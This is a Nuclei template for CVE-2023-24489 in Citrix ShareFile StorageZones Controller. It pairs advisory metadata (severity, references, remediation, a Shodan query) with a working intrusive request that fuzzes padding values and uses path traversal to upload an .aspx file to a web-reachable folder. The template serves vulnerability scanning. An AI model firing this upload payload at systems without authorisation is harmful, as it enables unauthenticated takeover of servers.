id: CVE-2023-24489 info: name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution author: DhiyaneshDK,dwisiswant0 severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-24489 - https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/ - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.9687 epss-percentile: 0.99637 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true max-request: 256 vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix variables: fileName: '{{rand_base(8)}}' http: - raw: - | POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1 Host: {{Hostname}} <%@ Page Language="C#" Debug="true" Trace="false" %> payloads: padding: helpers/payloads/citrix_paddings.txt threads: 30 stop-at-first-match: true matchers: - type: dsl dsl: - 'body == "ERROR: The method or operation is not implemented."' - 'status_code == 200' condition: and extractors: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' # digest: 4b0a0048304602210080656bcae150391e137dfffc8aa7568306c7bcbdf21622c9724be49a409a84640221008df0f18f91a88fe1a65a49150eb682c1aa39bda1cf09b8cb627d7039ac92be28:922c64590222798bb761d5b6d8e72950